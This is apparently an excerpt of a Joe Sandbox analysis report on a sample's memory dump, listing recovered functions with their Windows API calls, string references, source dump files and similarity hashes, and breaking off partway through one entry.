API String ID: 1038674560-2734436370
Opcode ID: 0b3b102f0924cd9ef78cfa57da2290a96296487a1e1e1e98458daa679e0cb36b
Instruction ID: 9b7adae7c47ed7da21af53d9a79197d809311abbfa9da86a37802f46813ee13e
Opcode Fuzzy Hash: 0b3b102f0924cd9ef78cfa57da2290a96296487a1e1e1e98458daa679e0cb36b
Instruction Fuzzy Hash: 16214C32130122B6D331EE249D03EAB73D8DF55701F504435FC4586193EBB5AEBA869D

Function 00287BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00202111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020214F
Part of subcall function 00202111: GetStockObject.GDI32(00000011), ref: 00202163
Part of subcall function 00202111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00287C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00287C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00287C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00287C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00287C8A

Strings

Msctls_Progress32, xrefs: 00287C28

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 62bacd352e9adc8bce6cdec8e3b1b04c92ed8a95dbe660a2e6c7a0529a131667
Instruction ID: a9de9cd4d2e08de178082157f833f0a6cb5de5bc1c36207ca91f02bfdc95e0d0
Opcode Fuzzy Hash: 62bacd352e9adc8bce6cdec8e3b1b04c92ed8a95dbe660a2e6c7a0529a131667
Instruction Fuzzy Hash: 861160B615021EBEEF159F60CC85EE7BF5DEF08798F114115BB08A6091CB729C21DBA4

Function 00229D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00229D16

Part of subcall function 002233B7: EncodePointer.KERNEL32(00000000), ref: 002233BA
Part of subcall function 002233B7: __initp_misc_winsig.LIBCMT ref: 002233D5
Part of subcall function 002233B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0022A0D0
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0022A0E4
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0022A0F7
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0022A10A
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0022A11D
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0022A130
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0022A143
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0022A156
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0022A169
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0022A17C
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0022A18F
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0022A1A2
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0022A1B5
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0022A1C8
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0022A1DB
Part of subcall function 002233B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0022A1EE

__mtinitlocks.LIBCMT ref: 00229D1B
__mtterm.LIBCMT ref: 00229D24

Part of subcall function 00229D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00229D29,00227EFD,002BCD38,00000014), ref: 00229E86
Part of subcall function 00229D8C: _free.LIBCMT ref: 00229E8D
Part of subcall function 00229D8C: DeleteCriticalSection.KERNEL32(0R,,?,?,00229D29,00227EFD,002BCD38,00000014), ref: 00229EAF

__calloc_crt.LIBCMT ref: 00229D49
__initptd.LIBCMT ref: 00229D6B
GetCurrentThreadId.KERNEL32 ref: 00229D72

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: a2d3ed8117fdf652d595e5fc4dd381bdc769aebba3239065a5e22493007e81c6
Instruction ID: fe08adae8ad81778850e781888a7e8244bc8f791e17b3fa2e2dec594160bb94e
Opcode Fuzzy Hash: a2d3ed8117fdf652d595e5fc4dd381bdc769aebba3239065a5e22493007e81c6
Instruction Fuzzy Hash: 83F06D3293A732BAE6347BF47C0778A2694EB41B30F20061AF464D50D3EF2089A25990

Function 002241B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00224282,?), ref: 002241D3
GetProcAddress.KERNEL32(00000000), ref: 002241DA
EncodePointer.KERNEL32(00000000), ref: 002241E6
DecodePointer.KERNEL32(00000001,00224282,?), ref: 00224203

Strings

combase.dll, xrefs: 002241CE
RoInitialize, xrefs: 002241C2

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 94f7b29efe4179007e4acfad0b9443f4dcb5e3a7832a580c87041daf3ba1c0dc
Instruction ID: 60d58127c561431f0cace2a50c60f37e6028d6a2ebd10a1b6cc4f67decfaca3f
Opcode Fuzzy Hash: 94f7b29efe4179007e4acfad0b9443f4dcb5e3a7832a580c87041daf3ba1c0dc
Instruction Fuzzy Hash: ACE01A706A0725AFDF116FB1FC8DF483664AB11B06F604525F409D50A0CBF5A0948F14

Function 0022428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002241A8), ref: 002242A8
GetProcAddress.KERNEL32(00000000), ref: 002242AF
EncodePointer.KERNEL32(00000000), ref: 002242BA
DecodePointer.KERNEL32(002241A8), ref: 002242D5

Strings

combase.dll, xrefs: 002242A3
RoUninitialize, xrefs: 00224297

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 04ac1dee8c20b01036fba9eaba850e1724d1fdc0b75c0b65d7624635556e9372
Instruction ID: 7d82380c7a3fc8f744877fb1f2416c98dc3de74f486ac3f606f0cdb4b4793e0d
Opcode Fuzzy Hash: 04ac1dee8c20b01036fba9eaba850e1724d1fdc0b75c0b65d7624635556e9372
Instruction Fuzzy Hash: A2E0EC70560765EFDB109FA2FD4DF443A64BB01B02F54021AF409D50F0CBF4A694CB24

Function 0020218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 002021B8
GetWindowRect.USER32(?,?), ref: 002021F9
ScreenToClient.USER32(?,?), ref: 00202221
GetClientRect.USER32(?,?), ref: 00202350
GetWindowRect.USER32(?,?), ref: 00202369

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 1088e746e6f06fea298dd0d1a1912584f1259d8c3e99901b37d335dab3af4683
Instruction ID: 96d7c919379b684df9663261df16b18c93cc91527e716cd7973cbfb5f1e657a2
Opcode Fuzzy Hash: 1088e746e6f06fea298dd0d1a1912584f1259d8c3e99901b37d335dab3af4683
Instruction Fuzzy Hash: CAB18B7992030ADBDF10CFA8C5847EDB7B1FF08310F14816AED59AB252DB70A964CB54

Function 00266A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00266BC6
_memmove.LIBCMT ref: 00266B01

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

_memmove.LIBCMT ref: 00266B74
_memmove.LIBCMT ref: 00266C5B
_memmove.LIBCMT ref: 00266C74
_memmove.LIBCMT ref: 00266C90

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 669abd5f133883bbe66da941e050c7de5cd5e1d90b0cbca621c2fd1bf2efa72e
Instruction ID: 3e8613fc86b728c45debed93d54beb26ce083be0847545f935409ea7ff4c728f
Opcode Fuzzy Hash: 669abd5f133883bbe66da941e050c7de5cd5e1d90b0cbca621c2fd1bf2efa72e
Instruction Fuzzy Hash: B261BE7052069AABCF11EFA0CC89EFE37A8AF05308F048559F9596B192DB349DB5CF50

Function 00280844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0028147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028040D,?,?), ref: 00281491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00280980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002809A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 002809EC
RegCloseKey.ADVAPI32(00000000), ref: 002809F9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 8cfd52ed56100e73c0cb6db641453c567bc7f93d8477a1bb88ead500536695d5
Instruction ID: 4b8c7e0080ab2446b953b2389429ae8b362e5db8c882318e4f2df1f063e0174a
Opcode Fuzzy Hash: 8cfd52ed56100e73c0cb6db641453c567bc7f93d8477a1bb88ead500536695d5
Instruction Fuzzy Hash: B6518A31128205AFD710EF64C885E6BBBE8FF84714F04491DF989872A2DB31E969CF52

Function 00285DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00285E38
GetMenuItemCount.USER32(00000000), ref: 00285E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00285E97
GetMenuItemID.USER32(?,?), ref: 00285F06
GetSubMenu.USER32(?,?), ref: 00285F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00285F65

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 04e57a80f0e1a8510241a70903057c56bba8acc0b09be9efb45296009bc112bd
Instruction ID: b73aafd552e6ef7b76f0f83ac54211e82cd07bd80f9cfa57316a79e81120956e
Opcode Fuzzy Hash: 04e57a80f0e1a8510241a70903057c56bba8acc0b09be9efb45296009bc112bd
Instruction Fuzzy Hash: 7251BF75A11A29AFCF11EFA4C845AAEB7B5EF48310F104059F901BB391CB74AE51CF90

Function 0025F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0025F6A2
VariantClear.OLEAUT32(00000013), ref: 0025F714
VariantClear.OLEAUT32(00000000), ref: 0025F76F
_memmove.LIBCMT ref: 0025F799
VariantClear.OLEAUT32(?), ref: 0025F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0025F814

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: e2ec0e44f5eef6ded7155decf8dbf40ea153e8cc9e5d40a0a98fa863c1101a73
Instruction ID: b16c7a23483f89fb7c9d3198412674547fca4e9cff059489c4786e558699308d
Opcode Fuzzy Hash: e2ec0e44f5eef6ded7155decf8dbf40ea153e8cc9e5d40a0a98fa863c1101a73
Instruction Fuzzy Hash: 255149B5A10209EFDB14CF58D884AAAB7B8FF4C314F15856AED59DB300E730E915CBA0

Function 002629B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002629FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00262A4A
IsMenu.USER32(00000000), ref: 00262A6A
CreatePopupMenu.USER32 ref: 00262A9E
GetMenuItemCount.USER32(000000FF), ref: 00262AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00262B2D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 96f726f62a3c88970472acb054cfe7631494dec90bd63b87ad51b777c81ba0ad
Instruction ID: 0872431302f6296b65276730ad9d096f481258604b8a417788aabaa0c1e14fbb
Opcode Fuzzy Hash: 96f726f62a3c88970472acb054cfe7631494dec90bd63b87ad51b777c81ba0ad
Instruction Fuzzy Hash: E751C170620A0ADFCF20CFA8D8C8BAEBBF4EF54318F144119E85197290D7B09DA8CB51

Function 00201B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00201B76
GetWindowRect.USER32(?,?), ref: 00201BDA
ScreenToClient.USER32(?,?), ref: 00201BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00201C08
EndPaint.USER32(?,?), ref: 00201C52

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 75c4b816ac2d2234dcee54913116e369ec5e174793cbda3d495174e4e8e5e7df
Instruction ID: edb736b0fda59f89789c8ca499292814cf2b8f71aff78b840247319b4c9c0549
Opcode Fuzzy Hash: 75c4b816ac2d2234dcee54913116e369ec5e174793cbda3d495174e4e8e5e7df
Instruction Fuzzy Hash: 9A41B070114305AFD711DF24DC88FBA7BF8EB49364F14066AFAA5872E2C7309865DB62

Function 0028BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(002C77B0,00000000,01525440,?,?,002C77B0,?,0028BC1A,?,?), ref: 0028BD84
EnableWindow.USER32(00000000,00000000), ref: 0028BDA8
ShowWindow.USER32(002C77B0,00000000,01525440,?,?,002C77B0,?,0028BC1A,?,?), ref: 0028BE08
ShowWindow.USER32(00000000,00000004,?,0028BC1A,?,?), ref: 0028BE1A
EnableWindow.USER32(00000000,00000001), ref: 0028BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0028BE61

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f71d861c90e5ba3454a66c7b0dcc7b5f17fa51d450be9b9f58681a793733f62a
Instruction ID: 3447e8552bccf2fbb67435a36d18bf65452b7618b85510116e7d0778fc7b97d2
Opcode Fuzzy Hash: f71d861c90e5ba3454a66c7b0dcc7b5f17fa51d450be9b9f58681a793733f62a
Instruction Fuzzy Hash: F0417038611146AFDB22DF14C489BD57BE1FF09314F1881ADEA588F6E2C731AC65CB50

Function 00277788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,0027550C,?,?,00000000,00000001), ref: 00277796

Part of subcall function 0027406C: GetWindowRect.USER32(?,?), ref: 0027407F

GetDesktopWindow.USER32 ref: 002777C0
GetWindowRect.USER32(00000000), ref: 002777C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002777F9

Part of subcall function 002657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00265877

GetCursorPos.USER32(?), ref: 00277825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00277883

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 082cec03f3d4ceb38037197e2897e07b98e32892ebb53fa228fedc5c7e7a138c
Instruction ID: 6bfda4e242f3357aff60574a3733a3c9fa73fb1a450d7df8d522111b76bd8bf4
Opcode Fuzzy Hash: 082cec03f3d4ceb38037197e2897e07b98e32892ebb53fa228fedc5c7e7a138c
Instruction Fuzzy Hash: 6831F57250831AAFD720DF14D849F9BB7E9FF88314F00491AF59997181CB30E928CB92

Function 00259431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00258CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00258CDE
Part of subcall function 00258CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00258CE8
Part of subcall function 00258CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00258CF7
Part of subcall function 00258CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00258CFE
Part of subcall function 00258CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00258D14

GetLengthSid.ADVAPI32(?,00000000,0025904D), ref: 00259482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0025948E
HeapAlloc.KERNEL32(00000000), ref: 00259495
CopySid.ADVAPI32(00000000,00000000,?), ref: 002594AE
GetProcessHeap.KERNEL32(00000000,00000000,0025904D), ref: 002594C2
HeapFree.KERNEL32(00000000), ref: 002594C9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 6f6f6a47c1bc27f04b1114cb8f1ce4f89c69ef104b4fe60425d1d3716bda6fb6
Instruction ID: c17ceae26bac5625c70a9dce81c575e2b0124237cd5c7f7188ca6ac14bfefffb
Opcode Fuzzy Hash: 6f6f6a47c1bc27f04b1114cb8f1ce4f89c69ef104b4fe60425d1d3716bda6fb6
Instruction Fuzzy Hash: 2211DC32520209EFDF108FA4DC49BAE7BAAEF41312F10801AEC4593210C736AD9ACB64

Function 002591CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00259200
OpenProcessToken.ADVAPI32(00000000), ref: 00259207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00259216
CloseHandle.KERNEL32(00000004), ref: 00259221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00259250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00259264

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
